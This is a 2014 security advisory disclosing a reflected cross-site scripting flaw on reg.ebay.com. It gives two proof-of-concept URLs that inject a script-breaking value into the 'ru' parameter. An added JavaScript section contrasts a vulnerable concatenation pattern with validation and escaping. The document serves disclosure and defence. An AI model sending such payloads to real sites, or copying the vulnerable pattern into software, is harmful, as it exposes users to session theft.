SSCHADV2014-004 - reg.ebay.com - Cross-site Scripting vulnerability
Advisory: reg.ebay.com – Cross-site Scripting vulnerability
Advisory ID: SSCHADV2014-004
Author: Stefan Schurtz
Affected Software: Successfully tested on reg.ebay.com
Vendor URL:
Vendor Status: informed
======================
Vulnerability Description
======================
The website reg.ebay.com is prone to a cross-site scripting vulnerability.
======================
PoC-Exploit
======================
https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo=&siteid=0&UsingSSL=1&co_partnerId=2&MfcISAPICommand=RegisterEnterInfo&co_partnerId=2&siteid=0&ru=http%253A%252F%252Fwww.ebay.com%252Fusr%252Fpatrice.php%253Ffol%253D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%2526widget%253Dfollow_113459%22%3bconfirm%28document.domain%29%2f%2f4189ebe3a&bin=3984&pageType=3984&register_signin=Register

https://reg.ebay.com/reg/PartialReg?siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fpatrice.php%3Ffol%3D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%26widget%3Dfollow_113459%22%3Bconfirm%28document.domain%29%2F%2F4189ebe3a&MfcISAPICommand=
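Added example, not part of the original advisory and not eBay's code: the payload in the PoC URLs decodes to `";confirm(document.domain)//`, which suggests (an assumption here) that `ru` is reflected inside a double-quoted JavaScript string. The sketch contrasts that pattern with allowlist validation plus JavaScript-string encoding; the function names, the host allowlist and the fallback URL are hypothetical.

```javascript
// Added example: hosts the application will return users to (assumed allowlist).
const ALLOWED_HOSTS = new Set(["www.ebay.com", "reg.ebay.com"]);

// Escape every character outside a small safe set as \uXXXX so the value
// cannot terminate a quoted JavaScript string or close a <script> element.
function escapeForJsString(value) {
  return value.replace(/[^A-Za-z0-9,._]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Parse the return URL, accept only http(s) on an allowlisted host, and
// return the parser's normalised serialisation; null means "use a default".
function validateReturnUrl(raw) {
  let url;
  try { url = new URL(raw); } catch { return null; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Vulnerable pattern (assumed): the decoded parameter is concatenated into script.
function renderNaive(ru) {
  return 'var ru = "' + ru + '";';
}

// Hardened pattern: validate first, then encode for the JavaScript string context.
function renderHardened(ru) {
  const safe = validateReturnUrl(ru) ?? "http://www.ebay.com/"; // hypothetical default
  return 'var ru = "' + escapeForJsString(safe) + '";';
}

// Constructed request, shortened from the shape of the PoC's ru parameter.
const query = new URLSearchParams(
  "siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fexample%3Fwidget%3Dfollow_1" +
  "%22%3Bconfirm%28document.domain%29%2F%2F");
const ru = query.get("ru");

console.log(renderNaive(ru));    // quote from the parameter ends the string early
console.log(renderHardened(ru)); // one string literal, no raw quote or semicolon
```

Validation alone does not make the value safe to embed, since an allowlisted URL can still carry quote characters in its query; the context-specific encoding is what keeps it inside the string literal.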
======================
Solution
======================
-
======================
Disclosure Timeline
======================
30-Jan-2014 – eBay informed via "http://pages.ebay.com/securitycenter/Researchers.html"
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt